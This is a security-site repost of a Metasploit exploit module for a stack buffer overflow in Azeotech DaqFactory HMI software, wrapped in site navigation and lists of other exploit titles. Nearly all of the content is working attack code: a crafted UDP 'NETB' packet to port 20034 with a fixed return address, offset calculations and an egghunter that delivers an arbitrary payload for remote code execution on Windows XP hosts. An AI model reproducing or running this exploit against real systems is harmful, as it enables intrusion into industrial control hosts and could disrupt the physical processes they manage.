首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
DaqFactory HMI NETB Request Overflow
来源:http://www.metasploit.com 作者:mr_me 发布时间:2011-09-20  

##
# $Id: daq_factory_bof.rb 13750 2011-09-18 02:45:55Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = GoodRanking

 include Msf::Exploit::Remote::Udp
 include Msf::Exploit::Remote::Egghunter

 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'DaqFactory HMI NETB Request Overflow',
   'Description'    => %q{
     This module exploits a stack buffer overflow in Azeotech's DaqFactory
    product. The specfic vulnerability is triggered when sending a specially crafted
    'NETB' request to port 20034. Exploitation of this vulnerability may take a few
    seconds due to the use of egghunter.  This vulnerability was one of the 14
    releases discovered by researcher Luigi Auriemma.
   },
   'Author'         =>
    [
     'Luigi Auriemma',  # Initial discovery, crash poc
     'mr_me <steventhomasseeley[at]gmail.com>',  # msf exploit
    ],

   'Version'        => '$Revision: 13750 $',
   'References'     =>
    [
     ['URL', 'http://aluigi.altervista.org/adv/daqfactory_1-adv.txt'],
    ],
   'DefaultOptions' =>
    {
     'EXITFUNC' => 'process',
     'InitialAutoRunScript' => 'migrate -f',
    },
   'Payload'        =>
    {
     'Space'    => 600,
     'BadChars' => "\x00",
    },
   'Platform'       => 'win',
   'Targets'        =>
    [
     [
      'DAQFactory Pro 5.85 Build 1853 on Windows XP SP3',
      {
       'Ret' => 0x100B9EDF,  # jmp esp PEGRP32A.dll
       'Offset' => 636,
      }
     ],
    ],
   'DisclosureDate' => 'Sep 13 2011',
   'DefaultTarget'  => 0))

  register_options(
   [
    # Required for EIP offset
    OptString.new('DHCP', [ true, "The DHCP server IP of the target", "" ]),
    Opt::RPORT(20034)
   ], self.class)
 end

 def exploit
  connect_udp

  print_status("Trying target #{target.name}...")

  eggoptions ={
   :checksum => false,
   :eggtag => 'scar',
  }

  # Correct the offset according to the 2nd IP (DHCP) length
  iplen = datastore['DHCP'].length

  if iplen == 15
   offset = 78
  elsif iplen == 14
   offset = 79
  elsif iplen == 13
   offset = 80
  elsif iplen == 12
   offset = 81
  elsif iplen == 11
   offset = 82
  elsif iplen == 10
   offset = 83
  elsif iplen == 9
   offset = 84
  elsif iplen == 8
   offset = 85
  elsif iplen == 7
   offset = 86
  elsif iplen == 6
   offset = 87
  # attack class A ip, slightly unlikly, but just in case.
  elsif iplen == 5
   offset = 88 
  end 

  if offset >= 80
   pktoffset = offset - 80
   finaloffset = target['Offset']-pktoffset
  elsif offset <= 79
   pktoffset = 80 - offset
   finaloffset = target['Offset']+pktoffset
  end

  # springboard onto our unmodified payload
  p = Rex::Arch::X86.jmp(750) + payload.encoded
  hunter,egg = generate_egghunter(p, payload_badchars, eggoptions)

  sploit  = "NETB"  # NETB request overflow
  sploit << rand_text_alpha_upper(233)
  sploit << "\x00"  # part of the packet structure
  sploit << rand_text_alpha_upper(offset)  # include the offset for the DHCP address
  sploit << make_nops(2)
  sploit << hunter
  sploit << rand_text_alpha_upper(52-hunter.length-2)
  sploit << [target.ret].pack("V")
  sploit << rand_text_alpha_upper(12)
  sploit << Rex::Arch::X86.jmp_short(-70)
  sploit << egg
  # packetlen needs to be adjusted to a max of 0x400 as per advisory
  sploit << rand_text_alpha_upper(finaloffset-egg.length)

  # The use of rand_text_alpha_upper() ensures we always get the same length for the
  # first IP address. See the following for more details:
  # http://dev.metasploit.com/redmine/issues/5453
  sploit[12,4] = rand_text_alpha_upper(4)

  udp_sock.put(sploit)

  handler
  disconnect_udp
 end

end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·KnFTP 1.0.0 Server - Remote Bu
·AMADIS Video Converter SEH Buf
·ScriptFTP <= 3.3 Remote Buffer
·3GP Video Converter Local Buff
·AVCon DEP Bypass
·Rever Audio Converter(avi To w
·ALL IN 1 MOBILE VIDEO Denial o
·MKV TO AVI Converter Local Buf
·Switch Media Editor(.m3u) Loca
·Cool Music Editor Local Stack
·Audio Gold Local Buffer Overfl
·ScriptFTP <=3.3 Remote Buffer
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved